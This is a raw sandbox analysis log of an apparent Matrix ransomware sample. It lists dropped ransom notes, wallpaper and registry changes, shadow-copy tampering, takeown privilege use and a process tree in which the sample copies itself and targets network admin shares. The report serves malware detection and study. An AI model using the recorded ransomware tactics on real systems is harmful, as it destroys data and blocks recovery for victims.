c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened (read-only) \??\M: c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened (read-only) \??\K: QvidfhME64.exe File opened (read-only) \??\P: QvidfhME64.exe File opened (read-only) \??\R: QvidfhME64.exe File opened (read-only) \??\L: c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened (read-only) \??\G: c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened (read-only) \??\U: QvidfhME64.exe File opened (read-only) \??\Y: QvidfhME64.exe File opened (read-only) \??\R: c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened (read-only) \??\Q: c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened (read-only) \??\O: c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened (read-only) \??\N: QvidfhME64.exe File opened (read-only) \??\S: QvidfhME64.exe File opened (read-only) \??\Z: QvidfhME64.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\B16Ee4FH.bmp" reg.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\distribute_form.gif c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\fr-fr\ui-strings.js c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\themes\dark\s_agreement_filetype.svg c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\en-ae\ui-strings.js c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\management-agent.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Mozilla Firefox\uninstall\helper.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_rename_18.svg c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\ro-ro\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\selector.js c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\da_get.svg c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\bin\setNetworkClientCP c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\triggerConstraints.exsd c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\fr-ma\ui-strings.js c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\de_get.svg c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\bin\tnameserv.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\themes\dark\share_icons.png c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\sk-sk\ui-strings.js c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\es-es\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\tzdb.dat c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.ui.zh_CN_5.5.0.165303.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-keyring-impl.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_editpdf_18.svg c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\en-il\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_fr_135x40.svg c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.databinding.beans.nl_zh_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.docs_5.5.0.165303.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-core_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\sk-sk\ui-strings.js c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\plugin.js c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\pt-br\ui-strings.js c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\selector.js c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\security\local_policy.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.core.services_1.2.1.v20140808-1251.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-api-search_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Mozilla Firefox\updater.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\cs-cz\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\en-il\ui-strings.js c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\tool-search-2x.png c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\en-US.pak c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\fr-ma\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\sl-si\ui-strings.js c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\hu-hu\ui-strings.js c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\nb-no\ui-strings.js c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-swing-plaf.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\bn\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\plugins\rhp\exportpdfupsell-app-selector.js c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\sl-si\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\kn.pak c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.jdp_5.5.0.165303.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\pt-br\ui-strings.js c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\fi-fi\ui-strings.js c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\themes\dark\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\export.svg c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\css\main.css c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-core-output2.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\remove.svg c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\pt-br\ui-strings.js c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_da_135x40.svg c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\ServiceProfiles\LocalService\winhttp\cachev3.dat svchost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4768 schtasks.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 4680 vssadmin.exe -
Modifies Control Panel 5 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Control Panel\Desktop\TileWallpaper = "0" reg.exe Key created \REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Control Panel\Desktop reg.exe Key created \REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Control Panel\Desktop reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Control Panel\Desktop\WallpaperStyle = "0" reg.exe Key created \REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Control Panel\Desktop reg.exe -
Modifies data under HKEY_USERS 5 IoCs
description ioc Process Set value (data) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-3e-6f-2c-c8-c7\WpadDecisionTime = db1d4ef07882d601 svchost.exe Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-3e-6f-2c-c8-c7\WpadDecision = "0" svchost.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad svchost.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-3e-6f-2c-c8-c7 svchost.exe Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-3e-6f-2c-c8-c7\WpadDecisionReason = "1" svchost.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 4208 QvidfhME64.exe 4208 QvidfhME64.exe 4208 QvidfhME64.exe 4208 QvidfhME64.exe 4208 QvidfhME64.exe 4208 QvidfhME64.exe 4208 QvidfhME64.exe 4208 QvidfhME64.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 4208 QvidfhME64.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 1772 svchost.exe Token: SeCreatePagefilePrivilege 1772 svchost.exe Token: SeDebugPrivilege 4208 QvidfhME64.exe Token: SeLoadDriverPrivilege 4208 QvidfhME64.exe Token: SeTakeOwnershipPrivilege 4328 takeown.exe Token: SeTakeOwnershipPrivilege 4880 takeown.exe Token: SeTakeOwnershipPrivilege 5036 takeown.exe Token: SeTakeOwnershipPrivilege 4184 takeown.exe Token: SeTakeOwnershipPrivilege 4296 takeown.exe Token: SeTakeOwnershipPrivilege 4760 takeown.exe Token: SeTakeOwnershipPrivilege 4956 takeown.exe Token: SeTakeOwnershipPrivilege 4140 takeown.exe Token: SeTakeOwnershipPrivilege 4236 takeown.exe Token: SeTakeOwnershipPrivilege 4428 takeown.exe Token: SeTakeOwnershipPrivilege 4444 takeown.exe Token: SeTakeOwnershipPrivilege 1244 takeown.exe Token: SeTakeOwnershipPrivilege 4004 takeown.exe Token: SeTakeOwnershipPrivilege 4452 takeown.exe Token: SeTakeOwnershipPrivilege 5052 takeown.exe Token: SeTakeOwnershipPrivilege 4892 takeown.exe Token: SeTakeOwnershipPrivilege 4504 takeown.exe Token: SeTakeOwnershipPrivilege 4944 takeown.exe Token: SeTakeOwnershipPrivilege 5112 takeown.exe Token: SeBackupPrivilege 4988 vssvc.exe Token: SeRestorePrivilege 4988 vssvc.exe Token: SeAuditPrivilege 4988 vssvc.exe Token: SeTakeOwnershipPrivilege 1868 takeown.exe Token: SeTakeOwnershipPrivilege 4364 takeown.exe Token: SeTakeOwnershipPrivilege 4664 takeown.exe Token: SeIncreaseQuotaPrivilege 4960 WMIC.exe Token: SeSecurityPrivilege 4960 WMIC.exe Token: SeTakeOwnershipPrivilege 4960 WMIC.exe Token: SeLoadDriverPrivilege 4960 WMIC.exe Token: SeSystemProfilePrivilege 4960 WMIC.exe Token: SeSystemtimePrivilege 4960 WMIC.exe Token: SeProfSingleProcessPrivilege 4960 WMIC.exe Token: SeIncBasePriorityPrivilege 4960 WMIC.exe Token: SeCreatePagefilePrivilege 4960 WMIC.exe Token: SeBackupPrivilege 4960 WMIC.exe Token: SeRestorePrivilege 4960 WMIC.exe Token: SeShutdownPrivilege 4960 WMIC.exe Token: SeDebugPrivilege 4960 WMIC.exe Token: SeSystemEnvironmentPrivilege 4960 WMIC.exe Token: SeRemoteShutdownPrivilege 4960 WMIC.exe Token: SeUndockPrivilege 4960 WMIC.exe Token: SeManageVolumePrivilege 4960 WMIC.exe Token: 33 4960 WMIC.exe Token: 34 4960 WMIC.exe Token: 35 4960 WMIC.exe Token: 36 4960 WMIC.exe Token: SeTakeOwnershipPrivilege 4500 takeown.exe Token: SeTakeOwnershipPrivilege 4032 takeown.exe Token: SeTakeOwnershipPrivilege 4224 takeown.exe Token: SeIncreaseQuotaPrivilege 4960 WMIC.exe Token: SeSecurityPrivilege 4960 WMIC.exe Token: SeTakeOwnershipPrivilege 4960 WMIC.exe Token: SeLoadDriverPrivilege 4960 WMIC.exe Token: SeSystemProfilePrivilege 4960 WMIC.exe Token: SeSystemtimePrivilege 4960 WMIC.exe Token: SeProfSingleProcessPrivilege 4960 WMIC.exe Token: SeIncBasePriorityPrivilege 4960 WMIC.exe Token: SeCreatePagefilePrivilege 4960 WMIC.exe Token: SeBackupPrivilege 4960 WMIC.exe Token: SeRestorePrivilege 4960 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3060 wrote to memory of 3832 3060 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 73 PID 3060 wrote to memory of 3832 3060 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 73 PID 3060 wrote to memory of 3832 3060 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 73 PID 3060 wrote to memory of 4012 3060 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 75 PID 3060 wrote to memory of 4012 3060 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 75 PID 3060 wrote to memory of 4012 3060 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 75 PID 3060 wrote to memory of 2032 3060 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 80 PID 3060 wrote to memory of 2032 3060 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 80 PID 3060 wrote to memory of 2032 3060 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 80 PID 3060 wrote to memory of 1896 3060 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 81 PID 3060 wrote to memory of 1896 3060 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 81 PID 3060 wrote to memory of 1896 3060 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 81 PID 2032 wrote to memory of 1516 2032 cmd.exe 84 PID 2032 wrote to memory of 1516 2032 cmd.exe 84 PID 2032 wrote to memory of 1516 2032 cmd.exe 84 PID 1896 wrote to memory of 4040 1896 cmd.exe 85 PID 1896 wrote to memory of 4040 1896 cmd.exe 85 PID 1896 wrote to memory of 4040 1896 cmd.exe 85 PID 2032 wrote to memory of 3768 2032 cmd.exe 86 PID 2032 wrote to memory of 3768 2032 cmd.exe 86 PID 2032 wrote to memory of 3768 2032 cmd.exe 86 PID 2032 wrote to memory of 1056 2032 cmd.exe 87 PID 2032 wrote to memory of 1056 2032 cmd.exe 87 PID 2032 wrote to memory of 1056 2032 cmd.exe 87 PID 3060 wrote to memory of 2928 3060 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 88 PID 3060 wrote to memory of 2928 3060 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 88 PID 3060 wrote to memory of 2928 3060 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 88 PID 2928 wrote to memory of 2256 2928 cmd.exe 90 PID 2928 wrote to memory of 2256 2928 cmd.exe 90 PID 2928 wrote to memory of 2256 2928 cmd.exe 90 PID 2928 wrote to memory of 4136 2928 cmd.exe 92 PID 2928 wrote to memory of 4136 2928 cmd.exe 92 PID 2928 wrote to memory of 4136 2928 cmd.exe 92 PID 2928 wrote to memory of 4156 2928 cmd.exe 93 PID 2928 wrote to memory of 4156 2928 cmd.exe 93 PID 2928 wrote to memory of 4156 2928 cmd.exe 93 PID 4156 wrote to memory of 4172 4156 cmd.exe 94 PID 4156 wrote to memory of 4172 4156 cmd.exe 94 PID 4156 wrote to memory of 4172 4156 cmd.exe 94 PID 4172 wrote to memory of 4208 4172 QvidfhME.exe 95 PID 4172 wrote to memory of 4208 4172 QvidfhME.exe 95 PID 3060 wrote to memory of 4256 3060 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 96 PID 3060 wrote to memory of 4256 3060 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 96 PID 3060 wrote to memory of 4256 3060 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 96 PID 4256 wrote to memory of 4308 4256 cmd.exe 98 PID 4256 wrote to memory of 4308 4256 cmd.exe 98 PID 4256 wrote to memory of 4308 4256 cmd.exe 98 PID 4256 wrote to memory of 4328 4256 cmd.exe 99 PID 4256 wrote to memory of 4328 4256 cmd.exe 99 PID 4256 wrote to memory of 4328 4256 cmd.exe 99 PID 4256 wrote to memory of 4352 4256 cmd.exe 100 PID 4256 wrote to memory of 4352 4256 cmd.exe 100 PID 4256 wrote to memory of 4352 4256 cmd.exe 100 PID 4352 wrote to memory of 4380 4352 cmd.exe 101 PID 4352 wrote to memory of 4380 4352 cmd.exe 101 PID 4352 wrote to memory of 4380 4352 cmd.exe 101 PID 4256 wrote to memory of 4400 4256 cmd.exe 102 PID 4256 wrote to memory of 4400 4256 cmd.exe 102 PID 4256 wrote to memory of 4400 4256 cmd.exe 102 PID 3060 wrote to memory of 4424 3060 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 103 PID 3060 wrote to memory of 4424 3060 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 103 PID 3060 wrote to memory of 4424 3060 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 103 PID 4424 wrote to memory of 4472 4424 cmd.exe 105 PID 4424 wrote to memory of 4472 4424 cmd.exe 105
Processes
-
C:\Users\Admin\AppData\Local\Temp\c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe"C:\Users\Admin\AppData\Local\Temp\c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe"1⤵
- Matrix Ransomware
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:3060 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe" "C:\Users\Admin\AppData\Local\Temp\NWEJ8MPw.exe"2⤵PID:3832
-
-
C:\Users\Admin\AppData\Local\Temp\NWEJ8MPw.exe"C:\Users\Admin\AppData\Local\Temp\NWEJ8MPw.exe" -n2⤵
- Executes dropped EXE
PID:4012 -
C:\Users\Admin\AppData\Local\Temp\NWEJ8MPw.exe"C:\Users\Admin\AppData\Local\Temp\NWEJ8MPw.exe" "\\10.10.0.54\C$"3⤵PID:5636
-
-
C:\Users\Admin\AppData\Local\Temp\NWEJ8MPw.exe"C:\Users\Admin\AppData\Local\Temp\NWEJ8MPw.exe" "\\10.10.0.58\C$"3⤵PID:280
-
-
-
